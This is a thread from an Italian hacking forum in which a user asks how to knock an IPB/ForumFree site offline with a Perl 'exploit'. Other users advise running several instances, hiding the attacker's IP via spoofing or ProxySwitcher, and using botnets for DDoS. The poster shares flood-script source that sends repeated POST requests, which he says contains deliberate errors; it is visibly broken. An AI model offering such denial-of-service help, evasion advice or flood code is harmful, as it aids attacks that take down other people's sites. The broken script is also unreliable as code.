Toggle sidebar
  • Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

Info Attacco Dos

sidiu95

sidiu95

Nuovo utente
Autore del topic
27 Gennaio 2011
27
0
Miglior risposta
0
ragazzi allora vorrei dei chiarimenti... solo per puro scopo informativo .. allora , ammettiamo che io voglia dossare un sito di forumfree (su IPB naturalmente).. Io ho trovato un exploit (che pero non era compilato del tutto e ho dovuto aggiungere io qualcosa) 0day di IPB in cui nella descrizione dice k funge con tutte le versioni al 100% , ora
1) dato k è su IPB dovrebbe dossare forumfree/forumcommunity giusto??
2)nel cmd dopo k lancio l'exploit (è in perl) e faccio quello k mi chiede mi escono tanti "+" (es. ++++++++++++++++...) e non finiscono .... Quindi teoricamente il dos finisce quando chiudo il cmd giusto??
3) come capisco k il sito sta subend l'attacco?? perke io nn vedo k rallenta o "crolla" xD , comunque se aprissi piu cmd e facessi attacchi sullo stesso sito andrebbe piu veloce??
4) è possibile proxarsi prima di fare l'attacco ?? come ??? xD



Scusate le domande , spero qualcuno esperto mi sappia rispondere esaurientemente lòl

PS: per quanto riguarda l'exploit non so se posso darlo , devo avere l'autorizzazione dai mod o qualcuno perche qualche lamer potrebbe far danno , ricordo k voglio solo provare (in piu lo provo su un sito mio k avevo fatto per esperimenti dato k nn voglio far danni ai forum altrui , il mio è un forumfree , ecco perche chiedo )
Grazie a tutti anticipatamente
 
Riferimento: Attacco Dos

sidiu95 ha detto:
ragazzi allora vorrei dei chiarimenti... solo per puro scopo informativo .. allora , ammettiamo che io voglia dossare un sito di forumfree (su IPB naturalmente).. Io ho trovato un exploit (che pero non era compilato del tutto e ho dovuto aggiungere io qualcosa) 0day di IPB in cui nella descrizione dice k funge con tutte le versioni al 100% , ora
1) dato k è su IPB dovrebbe dossare forumfree/forumcommunity giusto??
2)nel cmd dopo k lancio l'exploit (è in perl) e faccio quello k mi chiede mi escono tanti "+" (es. ++++++++++++++++...) e non finiscono .... Quindi teoricamente il dos finisce quando chiudo il cmd giusto??
3) come capisco k il sito sta subend l'attacco?? perke io nn vedo k rallenta o "crolla" xD , comunque se aprissi piu cmd e facessi attacchi sullo stesso sito andrebbe piu veloce??
4) è possibile proxarsi prima di fare l'attacco ?? come ??? xD



Scusate le domande , spero qualcuno esperto mi sappia rispondere esaurientemente lòl

PS: per quanto riguarda l'exploit non so se posso darlo , devo avere l'autorizzazione dai mod o qualcuno perche qualche lamer potrebbe far danno , ricordo k voglio solo provare (in piu lo provo su un sito mio k avevo fatto per esperimenti dato k nn voglio far danni ai forum altrui , il mio è un forumfree , ecco perche chiedo )
Grazie a tutti anticipatamente
Clicca per espandere...
Non sò dirti se l'exploit è giusto comunque...
Si , Se si chiude il dos l'attacco DoS finisce.
Come capire se il servizio è stato mandato offline ti dovrebbe uscire una schermata così :
2n3qmd.png

(Immagine presa da un utente che ha attaccato un sito con un attacco DoS).
Oppure la connessione col sito dovrebbe essere molto lenta.
Non sono sicuro ma utilizzando Metodi di Spoofing puoi nascondere il tuo ip.
Comunque Potresti utilizzare un attacco di tipo DDoS che utilizza una botnet.
(se sei interessato all'ultima parte posso spiegartelo)
 
Riferimento: Attacco Dos

sarei interessato all'ultima parte ...
 
Riferimento: Attacco Dos

sidiu95 ha detto:
sarei interessato all'ultima parte ...
Clicca per espandere...
DDoS : E' una tecnica utilizzata nell'ambito degli attacchi informatici.La sua funzione è la stessa di quella dell'attacco DoS solo che nell'Attacco DDoS (abbrevviazione per l'appunto di Distributed Denial of Service)vengono utilizzati più computer per effettuare un attacco più potente che me mandi il servizio offline in un tempo più breve.
In questo tipo di attacco l'attaccante tente a non farsi scoprire , per questo utilizza una botnet(Una rete di computer zombie - ovvero una rete di computer sotto il controllo dell'attaccante -)che tente a non far cadere la colpa sul vero attaccante ma sui computer zombie....
 
Riferimento: Attacco Dos

come nascondo l'ip ?? io ho l'exploit che fa collassare i siti basati su ipb , quindi devo mandare l'attacco da cmd , come nascondo l'ip in questo caso?
 
Riferimento: Attacco Dos

Puoi postare perfavore la source dell'exploit? >_>
 
Riferimento: Attacco Dos

ecco il source
use Socket;
if (@argV < 2) {&usage }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)/eg;
for ($i=0; $i>10; $i--)
{
$user="seeme".$rand.$i;
$data = "adsess=&"
;
$len = length $data;
$foo = "POST ".$dir."index.php HTTP/1.1\r\n".
"Accept: * /*\r\n".
"Accept-Language: en-gb\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host/rn".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$foo", 0);
syswriteSTDOUT, "+" ;
}
print "\n\n";
system('ping $host');
sub usage {
print "\tusage :/n";
print "\t$0 <host> </dir/>\n";
print "\tex: $0 127.0.0.1 /forum/\n";
print "\tex2: $0 127.0.0.1\n\n";
exit();
};
Clicca per espandere...
il source continene degli errori , lo fatto a posta per coloro che vogliono farne un uso sconsiderato
buon testing :wosd:
 
Riferimento: Attacco Dos

Se fai partire l'exploit da più CMD chiaramente l'attacco ha più effetto, comunque, per vedere se l'attacco ha effetto o no il browser dovrebbe darti un errore di connessione, simile a quello postato da BlackDark.

sidiu95 ha detto:
come nascondo l'ip ?? io ho l'exploit che fa collassare i siti basati su ipb , quindi devo mandare l'attacco da cmd , come nascondo l'ip in questo caso?
Clicca per espandere...

Usa ProxySwitcher.
 
Ultima modifica:
Riferimento: Attacco Dos

ragazzi ho aperto 5 cmd con l'attacco dos ma non ce il minimo rallentamento , stanno lavorando da quasi mezz'ora ò.ò , esiste un metodo piu efficace??
 
Riferimento: Attacco Dos

Ecco le 4 cose che devi fare :

1) Studiare
2) Studiare
3) Studiare
4) Studiare
 
Devi accedere o registrarti per rispondere qui.
 
 
Top
Indietro